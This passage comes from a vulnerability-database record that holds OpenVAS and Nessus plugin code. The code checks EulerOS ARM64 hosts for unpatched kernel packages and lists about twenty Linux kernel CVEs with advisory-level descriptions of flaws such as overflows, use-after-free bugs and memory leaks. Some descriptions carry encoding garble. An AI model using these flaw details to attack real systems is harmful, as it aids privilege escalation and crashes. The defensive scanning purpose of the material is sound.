"SUSE-SU-2016:3248-1", "SUSE-SU-2016:3252-1", "SUSE-SU-2017:0226-1", "SUSE-SU-2017:0227-1", "SUSE-SU-2017:0228-1", "SUSE-SU-2017:0229-1", "SUSE-SU-2017:0230-1", "SUSE-SU-2017:0231-1", "SUSE-SU-2017:0233-1", "SUSE-SU-2017:0234-1", "SUSE-SU-2017:0235-1", "SUSE-SU-2017:0244-1", "SUSE-SU-2017:0245-1", "SUSE-SU-2017:0246-1", "SUSE-SU-2017:0247-1", "SUSE-SU-2017:0248-1", "SUSE-SU-2017:0249-1", "SUSE-SU-2017:0267-1", "SUSE-SU-2017:0268-1", "SUSE-SU-2017:0278-1", "SUSE-SU-2017:0293-1", "SUSE-SU-2017:0294-1"]}, {"type": "thn", "idList": ["THN:72D5C1EE790D99032F95F4A094E36BD6"]}, {"type": "threatpost", "idList": ["THREATPOST:EED8FDF6683A87D839082F0F1529E0D3"]}, {"type": "ubuntu", "idList": ["USN-2141-1", "USN-2337-1", "USN-2516-1", "USN-2662-1", "USN-2663-1", "USN-2664-1", "USN-2666-1", "USN-2797-1", "USN-2967-1", "USN-2967-2", "USN-2968-1", "USN-2968-2", "USN-2970-1", "USN-2971-1", "USN-2971-2", "USN-2971-3", "USN-3056-1", "USN-3167-2", "USN-3168-1", "USN-3169-2", "USN-3169-4", "USN-3265-2", "USN-3324-1", "USN-3328-1", "USN-3329-1", "USN-3333-1", "USN-3334-1", "USN-3335-1", "USN-3381-1", "USN-3381-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-14616"]}, {"type": "virtuozzo", "idList": ["VZA-2017-054", "VZA-2017-055", "VZA-2017-056", "VZA-2017-059", "VZA-2017-060", "VZA-2017-061"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2016-9794", "epss": "0.000440000", "percentile": "0.082290000", "modified": "2023-03-15"}, {"cve": "CVE-2013-4513", "epss": "0.000440000", "percentile": "0.082980000", "modified": "2023-03-15"}, {"cve": "CVE-2016-7917", "epss": "0.000420000", "percentile": "0.056320000", "modified": "2023-03-15"}, {"cve": "CVE-2014-1737", "epss": "0.000440000", "percentile": "0.082290000", "modified": "2023-03-15"}, {"cve": "CVE-2015-1420", "epss": "0.000440000", "percentile": "0.082290000", "modified": "2023-03-15"}, {"cve": "CVE-2014-4655", "epss": "0.000440000", "percentile": "0.082290000", "modified": "2023-03-15"}, {"cve": "CVE-2016-5343", "epss": "0.004510000", "percentile": "0.712060000", "modified": "2023-03-15"}, {"cve": "CVE-2015-5257", "epss": "0.002410000", "percentile": "0.602750000", "modified": "2023-03-15"}, {"cve": "CVE-2016-5243", "epss": "0.000440000", "percentile": "0.082290000", "modified": "2023-03-15"}, {"cve": "CVE-2017-1000364", "epss": "0.002410000", "percentile": "0.602860000", "modified": "2023-03-15"}, {"cve": "CVE-2015-7515", "epss": "0.004520000", "percentile": "0.712310000", "modified": "2023-03-15"}, {"cve": "CVE-2014-3631", "epss": "0.000610000", "percentile": "0.237530000", "modified": "2023-03-15"}, {"cve": "CVE-2017-6345", "epss": "0.000420000", "percentile": "0.056320000", "modified": "2023-03-15"}, {"cve": "CVE-2016-4578", "epss": "0.000440000", "percentile": "0.084760000", "modified": "2023-03-15"}, {"cve": "CVE-2015-8961", "epss": "0.000940000", "percentile": "0.383010000", "modified": "2023-03-15"}, {"cve": "CVE-2015-8575", "epss": "0.001090000", "percentile": "0.423310000", "modified": "2023-03-15"}, {"cve": "CVE-2013-4587", "epss": "0.000440000", "percentile": "0.082290000", "modified": "2023-03-15"}, {"cve": "CVE-2017-2618", "epss": "0.000450000", "percentile": "0.122320000", "modified": "2023-03-15"}, {"cve": "CVE-2014-9419", "epss": "0.000440000", "percentile": "0.082290000", "modified": "2023-03-15"}, {"cve": "CVE-2018-14616", "epss": "0.001270000", "percentile": "0.457280000", "modified": "2023-03-15"}], "vulnersScore": 0.1}, "_state": {"dependencies": 1678957314, "score": 1683999172, "epss": 1678957426}, "_internal": {"score_hash": "dedc5e7a5715612010bb76b4347e95cd"}, "pluginID": "1361412562311220191508", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1508\");\n script_version(\"2020-02-05T08:56:28+0000\");\n script_cve_id(\"CVE-2013-4513\", \"CVE-2013-4587\", \"CVE-2014-1737\", \"CVE-2014-3631\", \"CVE-2014-4655\", \"CVE-2014-9419\", \"CVE-2015-1420\", \"CVE-2015-5257\", \"CVE-2015-7515\", \"CVE-2015-8575\", \"CVE-2015-8961\", \"CVE-2016-4578\", \"CVE-2016-5243\", \"CVE-2016-5343\", \"CVE-2016-7917\", \"CVE-2016-9794\", \"CVE-2017-1000364\", \"CVE-2017-2618\", \"CVE-2017-6345\", \"CVE-2018-14616\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-02-05 08:56:28 +0000 (Wed, 05 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:59:54 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1508)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1508\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1508\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1508 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"drivers/soc/qcom/qdsp6v2/voice_svc.c in the QDSP6v2 Voice Service driver for the Linux kernel 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, allows attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a write request, as demonstrated by a voice_svc_send_req buffer overflow.(CVE-2016-5343)\n\nA use-after-free flaw was found in the way the Linux kernel's Advanced Linux Sound Architecture (ALSA) implementation handled user controls. A local, privileged user could use this flaw to crash the system.(CVE-2014-4655)\n\nRace condition in the handle_to_path function in fs/fhandle.c in the Linux kernel through 3.19.1 allows local users to bypass intended size restrictions and trigger read operations on additional memory locations by changing the handle_bytes value of a file handle during the execution of this function.(CVE-2015-1420)\n\nA flaw was found in the way the Linux kernel's keys subsystem handled the termination condition in the associative array garbage collection functionality. A local, unprivileged user could use this flaw to crash the system.(CVE-2014-3631)\n\nA flaw was found in the ext4 subsystem. This vulnerability is a use after free vulnerability was found in __ext4_journal_stop(). Attackers could abuse this to allow any code which attempts to deal with the journal failure to be mishandled or not fail at all. This could lead to data corruption or crashes.(CVE-2015-8961)\n\nBuffer overflow in the oz_cdev_write function in drivers/staging/ozwpan/ozcdev.c in the Linux kernel before 3.12 allows local users to cause a denial of service or possibly have unspecified other impact via a crafted write operation.(CVE-2013-4513)\n\nThe nfnetlink_rcv_batch() function in 'net/netfilter/nfnetlink.c' in the Linux kernel before 4.5 does not check whether a batch message's length field is large enough, which allows local users to obtain sensitive information from kernel memory or cause a denial of service (infinite loop or out-of-bounds read) by leveraging the CAP_NET_ADMIN capability.(CVE-2016-7917)\n\nArray index error in the kvm_vm_ioctl_create_vcpu function in virt/kvm/kvm_main.c in the KVM subsystem in the Linux kernel through 3.12.5 allows local users to gain privileges via a large id value.(CVE-2013-4587)\n\nA leak of information was possible when issuing a netlink command of the stack memory area leading up to this function call. An attacker could use this to determine stack information for use in a later exploit.(CVE-2016-5243)\n\nAn issue was discovered in the Linux kernel in the ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "naslFamily": "Huawei EulerOS Local Security Checks"}

{"nessus": [{"lastseen": "2021-08-19T12:22:43", "description": "According to the versions of the kernel packages installed, the EulerOS Virtualization for ARM 64 installation on the remote host is affected by the following vulnerabilities :\n\n - drivers/soc/qcom/qdsp6v2/voice_svc.c in the QDSP6v2 Voice Service driver for the Linux kernel 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, allows attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a write request, as demonstrated by a voice_svc_send_req buffer overflow.(CVE-2016-5343i1/4%0\n\n - A use-after-free flaw was found in the way the Linux kernel's Advanced Linux Sound Architecture (ALSA) implementation handled user controls. A local, privileged user could use this flaw to crash the system.(CVE-2014-4655i1/4%0\n\n - Race condition in the handle_to_path function in fs/fhandle.c in the Linux kernel through 3.19.1 allows local users to bypass intended size restrictions and trigger read operations on additional memory locations by changing the handle_bytes value of a file handle during the execution of this function.(CVE-2015-1420i1/4%0\n\n - A flaw was found in the way the Linux kernel's keys subsystem handled the termination condition in the associative array garbage collection functionality. A local, unprivileged user could use this flaw to crash the system.(CVE-2014-3631i1/4%0\n\n - A flaw was found in the ext4 subsystem. This vulnerability is a use after free vulnerability was found in __ext4_journal_stop(). Attackers could abuse this to allow any code which attempts to deal with the journal failure to be mishandled or not fail at all.\n This could lead to data corruption or crashes.(CVE-2015-8961i1/4%0\n\n - Buffer overflow in the oz_cdev_write function in drivers/staging/ozwpan/ozcdev.c in the Linux kernel before 3.12 allows local users to cause a denial of service or possibly have unspecified other impact via a crafted write operation.(CVE-2013-4513i1/4%0\n\n - The nfnetlink_rcv_batch() function in 'net/netfilter/nfnetlink.c' in the Linux kernel before 4.5 does not check whether a batch message's length field is large enough, which allows local users to obtain sensitive information from kernel memory or cause a denial of service (infinite loop or out-of-bounds read) by leveraging the CAP_NET_ADMIN capability.(CVE-2016-7917i1/4%0\n\n - Array index error in the kvm_vm_ioctl_create_vcpu function in virt/kvm/kvm_main.c in the KVM subsystem in the Linux kernel through 3.12.5 allows local users to gain privileges via a large id value.(CVE-2013-4587i1/4%0\n\n - A leak of information was possible when issuing a netlink command of the stack memory area leading up to this function call. An attacker could use this to determine stack information for use in a later exploit.(CVE-2016-5243i1/4%0\n\n - An issue was discovered in the Linux kernel in the F2FS filesystem code. A NULL pointer dereference in fscrypt_do_page_crypto() in the fs/crypto/crypto.c function can occur when operating on a file on a corrupted f2fs image.(CVE-2018-14616i1/4%0\n\n - An out-of-bounds flaw was found in the kernel, where the sco_sock_bind() function (bluetooth/sco) did not check the length of its sockaddr parameter. As a result, more kernel memory was copied out than required, leaking information from the kernel stack (including kernel addresses). A local user could exploit this flaw to bypass kernel ASLR or leak other information.(CVE-2015-8575i1/4%0\n\n - A denial of service vulnerability was found in the WhiteHEAT USB Serial Driver (whiteheat_attach function in drivers/usb/serial/whiteheat.c). In the driver, the COMMAND_PORT variable was hard coded and set to 4 (5th element). The driver assumed that the number of ports would always be 5 and used port number 5 as the command port. However, when using a USB device in which the number of ports was set to a number less than 5 (for example, 3), the driver triggered a kernel NULL-pointer dereference. A non-privileged attacker could use this flaw to panic the host.(CVE-2015-5257i1/4%0\n\n - The LLC subsystem in the Linux kernel does not ensure that a certain destructor exists in required circumstances, which allows local users to cause a denial of service (BUG_ON) or possibly have unspecified other impact via crafted system calls.(CVE-2017-6345i1/4%0\n\n - A vulnerability was found in Linux kernel. There is an information leak in file sound/core/timer.c of the latest mainline Linux kernel. The stack object aEURoer1aEUR has a total size of 32 bytes. Its field aEURoeeventaEUR and aEURoevalaEUR both contain 4 bytes padding. These 8 bytes padding bytes are sent to user without being initialized.(CVE-2016-4578i1/4%0\n\n - An information leak flaw was found in the way the Linux kernel changed certain segment registers and thread-local storage (TLS) during a context switch. A local, unprivileged user could use this flaw to leak the user space TLS base address of an arbitrary process.(CVE-2014-9419i1/4%0\n\n - A flaw was found in the way memory was being allocated on the stack for user space binaries. If heap (or different memory region) and stack memory regions were adjacent to each other, an attacker could use this flaw to jump over the stack guard gap, cause controlled memory corruption on process stack or the adjacent memory region, and thus increase their privileges on the system. This is a kernel-side mitigation which increases the stack guard gap size from one page to 1 MiB to make successful exploitation of this issue more difficult.(CVE-2017-1000364i1/4%0\n\n - A flaw was found in the Linux kernel's handling of clearing SELinux attributes on /proc/pid/attr files. An empty (null) write to this file can crash the system by causing the system to attempt to access unmapped kernel memory.(CVE-2017-2618i1/4%0\n\n - A use-after-free vulnerability was found in ALSA pcm layer, which allows local users to cause a denial of service, memory corruption, or possibly other unspecified impact. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.(CVE-2016-9794i1/4%0\n\n - A flaw was found in the way the Linux kernel's floppy driver handled user space provided data in certain error code paths while processing FDRAWCMD IOCTL commands. A local user with write access to /dev/fdX could use this flaw to free (using the kfree() function) arbitrary kernel memory. (CVE-2014-1737, Important)t was found that the Linux kernel's floppy driver leaked internal kernel memory addresses to user space during the processing of the FDRAWCMD IOCTL command. A local user with write access to /dev/fdX could use this flaw to obtain information about the kernel heap arrangement. (CVE-2014-1738, Low)Note: A local user with write access to /dev/fdX could use these two flaws (CVE-2014-1737 in combination with CVE-2014-1738) to escalate their privileges on the system.(CVE-2014-1737i1/4%0\n\n - An out-of-bounds memory access flaw was found in the Linux kernel's aiptek USB tablet driver (aiptek_probe() function in drivers/input/tablet/aiptek.c). The driver assumed that the interface always had at least one endpoint. By using a specially crafted USB device with no endpoints on one of its interfaces, an unprivileged user with physical access to the system could trigger a kernel NULL pointer dereference, causing the system to panic.(CVE-2015-7515i1/4%0\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-05-21T00:00:00", "type": "nessus", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1508)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4513", "CVE-2013-4587", "CVE-2014-1737", "CVE-2014-3631", "CVE-2014-4655", "CVE-2014-9419", "CVE-2015-1420", "CVE-2015-5257", "CVE-2015-7515", "CVE-2015-8575", "CVE-2015-8961", "CVE-2016-4578", "CVE-2016-5243", "CVE-2016-5343", "CVE-2016-7917", "CVE-2016-9794", "CVE-2017-1000364", "CVE-2017-2618", "CVE-2017-6345", "CVE-2018-14616"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:python-perf", "cpe:/o:huawei:euleros:uvp:3.0.1.0"], "id": "EULEROS_SA-2019-1508.NASL", "href": "https://www.tenable.com/plugins/nessus/125301", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125301);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2013-4513\",\n \"CVE-2013-4587\",\n \"CVE-2014-1737\",\n \"CVE-2014-3631\",\n \"CVE-2014-4655\",\n \"CVE-2014-9419\",\n \"CVE-2015-1420\",\n \"CVE-2015-5257\",\n \"CVE-2015-7515\",\n \"CVE-2015-8575\",\n \"CVE-2015-8961\",\n \"CVE-2016-4578\",\n \"CVE-2016-5243\",\n \"CVE-2016-5343\",\n \"CVE-2016-7917\",\n \"CVE-2016-9794\",\n \"CVE-2017-1000364\",\n \"CVE-2017-2618\",\n \"CVE-2017-6345\",\n \"CVE-2018-14616\"\n );\n script_bugtraq_id(\n 63508,\n 64328,\n 67300,\n 68162,\n 70095,\n 71794,\n 72357\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1508)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - drivers/soc/qcom/qdsp6v2/voice_svc.c in the QDSP6v2\n Voice Service driver for the Linux kernel 3.x, as used\n in Qualcomm Innovation Center (QuIC) Android\n contributions for MSM devices and other products,\n allows attackers to cause a denial of service (memory\n corruption) or possibly have unspecified other impact\n via a write request, as demonstrated by a\n voice_svc_send_req buffer overflow.(CVE-2016-5343i1/4%0\n\n - A use-after-free flaw was found in the way the Linux\n kernel's Advanced Linux Sound Architecture (ALSA)\n implementation handled user controls. A local,\n privileged user could use this flaw to crash the\n system.(CVE-2014-4655i1/4%0\n\n - Race condition in the handle_to_path function in\n fs/fhandle.c in the Linux kernel through 3.19.1 allows\n local users to bypass intended size restrictions and\n trigger read operations on additional memory locations\n by changing the handle_bytes value of a file handle\n during the execution of this function.(CVE-2015-1420i1/4%0\n\n - A flaw was found in the way the Linux kernel's keys\n subsystem handled the termination condition in the\n associative array garbage collection functionality. A\n local, unprivileged user could use this flaw to crash\n the system.(CVE-2014-3631i1/4%0\n\n - A flaw was found in the ext4 subsystem. This\n vulnerability is a use after free vulnerability was\n found in __ext4_journal_stop(). Attackers could abuse\n this to allow any code which attempts to deal with the\n journal failure to be mishandled or not fail at all.\n This could lead to data corruption or\n crashes.(CVE-2015-8961i1/4%0\n\n - Buffer overflow in the oz_cdev_write function in\n drivers/staging/ozwpan/ozcdev.c in the Linux kernel\n before 3.12 allows local users to cause a denial of\n service or possibly have unspecified other impact via a\n crafted write operation.(CVE-2013-4513i1/4%0\n\n - The nfnetlink_rcv_batch() function in\n 'net/netfilter/nfnetlink.c' in the Linux kernel before\n 4.5 does not check whether a batch message's length\n field is large enough, which allows local users to\n obtain sensitive information from kernel memory or\n cause a denial of service (infinite loop or\n out-of-bounds read) by leveraging the CAP_NET_ADMIN\n capability.(CVE-2016-7917i1/4%0\n\n - Array index error in the kvm_vm_ioctl_create_vcpu\n function in virt/kvm/kvm_main.c in the KVM subsystem in\n the Linux kernel through 3.12.5 allows local users to\n gain privileges via a large id value.(CVE-2013-4587i1/4%0\n\n - A leak of information was possible when issuing a\n netlink command of the stack memory area leading up to\n this function call. An attacker could use this to\n determine stack information for use in a later\n exploit.(CVE-2016-5243i1/4%0\n\n - An issue was discovered in the Linux kernel in the F2FS\n filesystem code. A NULL pointer dereference in\n fscrypt_do_page_crypto() in the fs/crypto/crypto.c\n function can occur when operating on a file on a\n corrupted f2fs image.(CVE-2018-14616i1/4%0\n\n - An out-of-bounds flaw was found in the kernel, where\n the sco_sock_bind() function (bluetooth/sco) did not\n check the length of its sockaddr parameter. As a\n result, more kernel memory was copied out than\n required, leaking information from the kernel stack\n (including kernel addresses). A local user could\n exploit this flaw to bypass kernel ASLR or leak other\n information.(CVE-2015-8575i1/4%0\n\n - A denial of service vulnerability was found in the\n WhiteHEAT USB Serial Driver (whiteheat_attach function\n in drivers/usb/serial/whiteheat.c). In the driver, the\n COMMAND_PORT variable was hard coded and set to 4 (5th\n element). The driver assumed that the number of ports\n would always be 5 and used port number 5 as the command\n port. However, when using a USB device in which the\n number of ports was set to a number less than 5 (for\n example, 3), the driver triggered a kernel NULL-pointer\n dereference. A non-privileged attacker could use this\n flaw to panic the host.(CVE-2015-5257i1/4%0\n\n - The LLC subsystem in the Linux kernel does not ensure\n that a certain destructor exists in required\n circumstances, which allows local users to cause a\n denial of service (BUG_ON) or possibly have unspecified\n other impact via crafted system calls.(CVE-2017-6345i1/4%0\n\n - A vulnerability was found in Linux kernel. There is an\n information leak in file sound/core/timer.c of the\n latest mainline Linux kernel. The stack object aEURoer1aEUR\n has a total size of 32 bytes. Its field aEURoeeventaEUR and\n aEURoevalaEUR both contain 4 bytes padding. These 8 bytes\n padding bytes are sent to user without being\n initialized.(CVE-2016-4578i1/4%0\n\n - An information leak flaw was found in the way the Linux\n kernel changed certain segment registers and\n thread-local storage (TLS) during a context switch. A\n local, unprivileged user could use this flaw to leak\n the user space TLS base address of an arbitrary\n process.(CVE-2014-9419i1/4%0\n\n - A flaw was found in the way memory was being allocated\n on the stack for user space binaries. If heap (or\n different memory region) and stack memory regions were\n adjacent to each other, an attacker could use this flaw\n to jump over the stack guard gap, cause controlled\n memory corruption on process stack or the adjacent\n memory region, and thus increase their privileges on\n the system. This is a kernel-side mitigation which\n increases the stack guard gap size from one page to 1\n MiB to make successful exploitation of this issue more\n difficult.(CVE-2017-1000364i1/4%0\n\n - A flaw was found in the Linux kernel's handling of\n clearing SELinux attributes on /proc/pid/attr files. An\n empty (null) write to this file can crash the system by\n causing the system to attempt to access unmapped kernel\n memory.(CVE-2017-2618i1/4%0\n\n - A use-after-free vulnerability was found in ALSA pcm\n layer, which allows local users to cause a denial of\n service, memory corruption, or possibly other\n unspecified impact. Due to the nature of the flaw,\n privilege escalation cannot be fully ruled out,\n although we believe it is unlikely.(CVE-2016-9794i1/4%0\n\n - A flaw was found in the way the Linux kernel's floppy\n driver handled user space provided data in certain\n error code paths while processing FDRAWCMD IOCTL\n commands. A local user with write access to /dev/fdX\n could use this flaw to free (using the kfree()\n function) arbitrary kernel memory. (CVE-2014-1737,\n Important)t was found that the Linux kernel's floppy\n driver leaked internal kernel memory addresses to user\n space during the processing of the FDRAWCMD IOCTL\n command. A local user with write access to /dev/fdX\n could use this flaw to obtain information about the\n kernel heap arrangement. (CVE-2014-1738, Low)Note: A\n local user with write access to /dev/fdX could use\n these two flaws (CVE-2014-1737 in combination with\n CVE-2014-1738) to escalate their privileges on the\n system.(CVE-2014-1737i1/4%0\n\n - An out-of-bounds memory access flaw was found in the\n Linux kernel's aiptek USB tablet driver (aiptek_probe()\n function in drivers/input/tablet/aiptek.c). The driver\n assumed that the interface always had at least one\n endpoint. By using a specially crafted USB device with\n no endpoints on one of its interfaces, an unprivileged\n user with physical access to the system could trigger a\n kernel NULL pointer dereference, causing the system to\n panic.(CVE-2015-7515i1/4%0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1508\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?16ed611a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Solaris RSH Stack Clash Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-4.19.28-1.2.117\",\n \"kernel-devel-4.19.28-1.2.117\",\n \"kernel-headers-4.19.28-1.2.117\",\n \"kernel-tools-4.19.28-1.2.117\",\n \"kernel-tools-libs-4.19.28-1.2.117\",\n \"kernel-tools-libs-devel-4.19.28-1.2.117\",\n \"perf-4.19.28-1.2.117\",\n 